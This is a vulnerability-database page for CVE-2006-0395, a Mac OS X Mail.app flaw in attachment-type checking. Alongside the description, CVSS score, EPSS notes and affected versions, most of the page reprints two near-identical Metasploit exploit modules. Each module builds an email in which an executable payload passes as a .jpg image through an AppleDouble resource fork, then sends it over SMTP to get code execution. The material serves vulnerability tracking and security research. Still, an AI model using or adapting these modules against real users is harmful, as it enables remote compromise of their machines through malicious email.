Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
The Download Validation in Mail in Mac OS X 10.4 does not properly recognize attachment file types to warn a user of an unsafe type, which allows user-assisted remote attackers to execute arbitrary code via crafted file types.
CVE Informations
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 5.1 | AV:N/AC:H/Au:N/C:P/I:P/A:P | nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 16870
Publication date : 2011-03-04 23h00 +00:00
Author : Metasploit
EDB Verified : Yes
##
# $Id: mailapp_image_exec.rb 10397 2010-09-20 15:59:46Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
#
# This module sends email messages via smtp
#
include Msf::Exploit::Remote::SMTPDeliver
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Mail.app Image Attachment Command Execution',
'Description' => %q{
This module exploits a command execution vulnerability in the
Mail.app application shipped with Mac OS X 10.5.0. This flaw was
patched in 10.4 in March of 2007, but reintroduced into the final
release of 10.5.
},
'License' => MSF_LICENSE,
'Author' => ['hdm', 'kf'],
'Version' => '$Revision: 10397 $',
'References' =>
[
['CVE', '2006-0395'],
['CVE', '2007-6165'],
['OSVDB', '40875'],
['BID', '26510'],
['BID', '16907']
],
'Stance' => Msf::Exploit::Stance::Passive,
'Payload' =>
{
'Space' => 8192,
'DisableNops' => true,
'BadChars' => "",
'Compat' =>
{
'ConnectionType' => '-bind -find',
},
},
'Targets' =>
[
[ 'Mail.app - Command Payloads',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'PayloadCompat' => {
'RequiredCmd' => 'generic perl ruby bash telnet',
}
}
],
[ 'Mail.app - Binary Payloads (x86)',
{
'Platform' => 'osx',
'Arch' => ARCH_X86,
}
],
[ 'Mail.app - Binary Payloads (ppc)',
{
'Platform' => 'osx',
'Arch' => ARCH_PPC,
}
],
],
'DisclosureDate' => 'Mar 01 2006'
))
end
def autofilter
false
end
def exploit
exts = ['jpg']
gext = exts[rand(exts.length)]
name = rand_text_alpha(5) + ".#{gext}"
data = rand_text_alpha(rand(32)+1)
msg = Rex::MIME::Message.new
msg.mime_defaults
msg.subject = datastore['SUBJECT'] || Rex::Text.rand_text_alpha(rand(32)+1)
msg.to = datastore['MAILTO']
msg.from = datastore['MAILFROM']
dbl = Rex::MIME::Message.new
dbl.header.set("Content-Type", "multipart/appledouble;\r\n boundary=#{dbl.bound}")
dbl.header.set("Content-Disposition", "inline")
# AppleDouble file version 2
# 3 entries - 'Finder Info', 'Real name', 'Resource Fork'
# Real Name matches msf random generated 5 character name - (I cheated ala gsub)
resfork =
"AAUWBwACAAAAAAAAAAAAAAAAAAAAAAAAAAMAAAAJAAAAPgAAAAoAAAADAAAASAAAAAkAAAACAAAA\r\n" +
"UQAABToAAAAAAAAAAAAASGVpc2UuanBnAAABAAAABQgAAAQIAAAAMgAAAAAAAAAAAAAAAAAAAAAA\r\n" +
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQA\r\n" +
"AAAlL0FwcGxpY2F0aW9ucy9VdGlsaXRpZXMvVGVybWluYWwuYXBwAOzs7P/s7Oz/7Ozs/+zs7P/s\r\n" +
"7Oz/7Ozs/+Hh4f/h4eH/4eHh/+Hh4f/h4eH/4eHh/+Hh4f/h4eH/5ubm/+bm5v/m5ub/5ubm/+bm\r\n" +
"5v/m5ub/5ubm/+bm5v/p6en/6enp/+np6f/p6en/6enp/+np6f/p6en/6enp/+zs7P/s7Oz/7Ozs\r\n" +
"/+zs7P/s7Oz/7Ozs/+zs7P/s7Oz/7+/v/+/v7//v7+//7+/v/+/v7//v7+//7+/v/+/v7//z8/P/\r\n" +
"8/Pz//Pz8//z8/P/8/Pz//Pz8//z8/P/8/Pz//b29v/29vb/9vb2//b29v/29vb/9vb2//b29v/2\r\n" +
"9vb/+Pj4//j4+P/4+Pj/+Pj4//j4+P/4+Pj/+Pj4//j4+P/8/Pz//Pz8//z8/P/8/Pz//Pz8//z8\r\n" +
"/P/8/Pz//Pz8////////////////////////////////////////////////////////////////\r\n" +
"/////////////////////6gAAACoAAAAqAAAAKgAAACoAAAAqAAAAKgAAACoAAAAKgAAACoAAAAq\r\n" +
"AAAAKgAAACoAAAAqAAAAKgAAACoAAAADAAAAAwAAAAMAAAADAAAAAwAAAAMAAAADAAAAAwAAAAAA\r\n" +
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
"AAAAAQAAAAUIAAAECAAAADIAX9CsEsIAAAAcADIAAHVzcm8AAAAKAAD//wAAAAABDSF8" + "\r\n"
fork = Rex::Text.encode_base64( Rex::Text.decode_base64(resfork).gsub("Heise.jpg",name), "\r\n" )
cid = "<#{rand_text_alpha(rand(16)+16)}@#{rand_text_alpha(rand(16)+1)}.com>"
cmd = ''
if (target.arch.include?(ARCH_CMD))
cmd = Rex::Text.encode_base64(payload.encoded, "\r\n")
else
bin = generate_payload_exe
cmd = Rex::Text.encode_base64(bin, "\r\n")
end
dbl.add_part(fork , "application/applefile;\r\n name=\"#{name}\"", "base64", "inline;\r\n filename=#{name}" )
dbl.add_part(cmd , "image/jpeg;\r\n x-mac-type=0;\r\n x-unix-mode=0755;\r\n x-mac-creator=0;\r\n name=\"#{name}\"", "base64\r\nContent-Id: #{cid}", "inline;\r\n filename=#{name}" )
msg.parts << dbl
send_message(msg.to_s)
print_status("Waiting for a payload session (backgrounding)...")
end
end
Exploit Database EDB-ID : 9929
Publication date : 2006-02-28 23h00 +00:00
Author : H D Moore
EDB Verified : Yes
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
#
# This module sends email messages via smtp
#
include Msf::Exploit::Remote::SMTPDeliver
def initialize(info = {})
super(update_info(info,
'Name' => 'Mail.app Image Attachment Command Execution',
'Description' => %q{
This module exploits a command execution vulnerability in the
Mail.app application shipped with Mac OS X 10.5.0. This flaw was
patched in 10.4 in March of 2007, but reintroduced into the final
release of 10.5.
},
'License' => MSF_LICENSE,
'Author' => ['hdm', 'kf'],
'Version' => '$Revision$',
'References' =>
[
['CVE', '2006-0395'],
['CVE', '2007-6165'],
['OSVDB', '40875'],
['BID', '26510'],
['BID', '16907']
],
'Stance' => Msf::Exploit::Stance::Passive,
'Payload' =>
{
'Space' => 8192,
'DisableNops' => true,
'BadChars' => "",
'Compat' =>
{
'ConnectionType' => '-bind -find',
'RequiredCmd' => 'generic perl ruby bash telnet',
},
},
'Targets' =>
[
[ 'Mail.app - Command Payloads',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
}
],
[ 'Mail.app - Binary Payloads (x86)',
{
'Platform' => 'osx',
'Arch' => ARCH_X86,
}
],
[ 'Mail.app - Binary Payloads (ppc)',
{
'Platform' => 'osx',
'Arch' => ARCH_PPC,
}
],
],
'DisclosureDate' => 'Mar 01 2006'
))
register_options(
[
OptString.new('MAILSUBJECT', [false, "The subject of the sent email"])
], self.class)
end
def autofilter
false
end
def exploit
exts = ['jpg']
gext = exts[rand(exts.length)]
name = rand_text_alpha(5) + ".#{gext}"
data = rand_text_alpha(rand(32)+1)
msg = Rex::MIME::Message.new
msg.mime_defaults
msg.subject = datastore['MAILSUBJECT'] || Rex::Text.rand_text_alpha(rand(32)+1)
msg.to = datastore['MAILTO']
msg.from = datastore['MAILFROM']
dbl = Rex::MIME::Message.new
dbl.header.set("Content-Type", "multipart/appledouble;\r\n boundary=#{dbl.bound}")
dbl.header.set("Content-Disposition", "inline")
# AppleDouble file version 2
# 3 entries - 'Finder Info', 'Real name', 'Resource Fork'
# Real Name matches msf random generated 5 character name - (I cheated ala gsub)
resfork =
"AAUWBwACAAAAAAAAAAAAAAAAAAAAAAAAAAMAAAAJAAAAPgAAAAoAAAADAAAASAAAAAkAAAACAAAA\r\n" +
"UQAABToAAAAAAAAAAAAASGVpc2UuanBnAAABAAAABQgAAAQIAAAAMgAAAAAAAAAAAAAAAAAAAAAA\r\n" +
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQA\r\n" +
"AAAlL0FwcGxpY2F0aW9ucy9VdGlsaXRpZXMvVGVybWluYWwuYXBwAOzs7P/s7Oz/7Ozs/+zs7P/s\r\n" +
"7Oz/7Ozs/+Hh4f/h4eH/4eHh/+Hh4f/h4eH/4eHh/+Hh4f/h4eH/5ubm/+bm5v/m5ub/5ubm/+bm\r\n" +
"5v/m5ub/5ubm/+bm5v/p6en/6enp/+np6f/p6en/6enp/+np6f/p6en/6enp/+zs7P/s7Oz/7Ozs\r\n" +
"/+zs7P/s7Oz/7Ozs/+zs7P/s7Oz/7+/v/+/v7//v7+//7+/v/+/v7//v7+//7+/v/+/v7//z8/P/\r\n" +
"8/Pz//Pz8//z8/P/8/Pz//Pz8//z8/P/8/Pz//b29v/29vb/9vb2//b29v/29vb/9vb2//b29v/2\r\n" +
"9vb/+Pj4//j4+P/4+Pj/+Pj4//j4+P/4+Pj/+Pj4//j4+P/8/Pz//Pz8//z8/P/8/Pz//Pz8//z8\r\n" +
"/P/8/Pz//Pz8////////////////////////////////////////////////////////////////\r\n" +
"/////////////////////6gAAACoAAAAqAAAAKgAAACoAAAAqAAAAKgAAACoAAAAKgAAACoAAAAq\r\n" +
"AAAAKgAAACoAAAAqAAAAKgAAACoAAAADAAAAAwAAAAMAAAADAAAAAwAAAAMAAAADAAAAAwAAAAAA\r\n" +
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
"AAAAAQAAAAUIAAAECAAAADIAX9CsEsIAAAAcADIAAHVzcm8AAAAKAAD//wAAAAABDSF8" + "\r\n"
fork = Rex::Text.encode_base64( Rex::Text.decode_base64(resfork).gsub("Heise.jpg",name), "\r\n" )
cid = "<#{rand_text_alpha(rand(16)+16)}@#{rand_text_alpha(rand(16)+1)}.com>"
cmd = ''
if (target.arch.include?(ARCH_CMD))
cmd = Rex::Text.encode_base64(payload.encoded, "\r\n")
else
bin = ''
if(target.arch.index(ARCH_PPC))
bin = Rex::Text.to_osx_ppc_macho(payload.encoded, '')
end
if(target.arch.index(ARCH_X86))
bin = Rex::Text.to_osx_x86_macho(payload.encoded, '')
end
cmd = Rex::Text.encode_base64(bin, "\r\n")
end
dbl.add_part(fork , "application/applefile;\r\n name=\"#{name}\"", "base64", "inline;\r\n filename=#{name}" )
dbl.add_part(cmd , "image/jpeg;\r\n x-mac-type=0;\r\n x-unix-mode=0755;\r\n x-mac-creator=0;\r\n name=\"#{name}\"", "base64\r\nContent-Id: #{cid}", "inline;\r\n filename=#{name}" )
msg.parts << dbl
send_message(msg.to_s)
print_status("Waiting for a payload session (backgrounding)...")
end
end
Products Mentioned
Configuraton 0
Apple>>Mac_os_x >> Version 10.4.5
- Apple>>Mac_os_x >> Version 10.4.5 (Open CPE detail)
Apple>>Mac_os_x_server >> Version 10.4.5
- Apple>>Mac_os_x_server >> Version 10.4.5 (Open CPE detail)
References
http://lists.apple.com/archives/client-management/2006/Mar/msg00030.html
Tags : vendor-advisory, x_refsource_APPLE
Tags : vendor-advisory, x_refsource_APPLE
